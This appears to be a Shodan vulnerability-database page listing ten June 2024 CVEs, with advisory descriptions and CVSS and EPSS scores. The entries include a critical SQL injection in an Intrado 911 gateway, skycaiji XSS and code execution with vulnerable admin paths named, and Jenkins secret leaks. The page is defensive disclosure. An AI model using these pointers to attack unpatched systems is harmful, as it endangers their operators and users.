Shodan
Vulnerabilities
Vulnerable Software
Security Vulnerabilities - CVEs Published In June 2024
CVE-2024-1839
Intrado 911 Emergency Gateway login form is vulnerable to an unauthenticated blind time-based SQL injection, which may allow an unauthenticated remote attacker to execute malicious code, exfiltrate data, or manipulate the database.
CVSS Score
10.0
EPSS Score
0.008
Published
2024-06-26
CVE-2024-38949
Heap Buffer Overflow vulnerability in Libde265 v1.0.15 allows attackers to crash the application via crafted payload to display444as420 function at sdl.cc
CVSS Score
6.5
EPSS Score
0.001
Published
2024-06-26
CVE-2024-38950
Heap Buffer Overflow vulnerability in Libde265 v1.0.15 allows attackers to crash the application via crafted payload to __interceptor_memcpy function.
CVSS Score
6.5
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39241
Cross Site Scripting (XSS) vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview.
CVSS Score
6.1
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39242
A cross-site scripting (XSS) vulnerability in skycaiji v2.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload using eval(String.fromCharCode()).
CVSS Score
6.1
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39243
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to /index.php?s=/admin/develop/editor_save.
CVSS Score
9.8
EPSS Score
0.002
Published
2024-06-26
CVE-2024-35545
MAP-OS v4.45.0 and earlier was discovered to contain a cross-site scripting (XSS) vulnerability.
CVSS Score
6.1
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39458
When Jenkins Structs Plugin 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters, potentially resulting in accidental exposure of secrets through the default system log.
CVSS Score
3.1
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39459
In rare cases Jenkins Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier stores secret file credentials unencrypted (only Base64 encoded) on the Jenkins controller file system, where they can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).
CVSS Score
4.3
EPSS Score
0.002
Published
2024-06-26
CVE-2024-39460
Jenkins Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.
CVSS Score
4.3
EPSS Score
0.002
Published
2024-06-26


Products
Pricing
Contact Us

Shodan ® - All rights reserved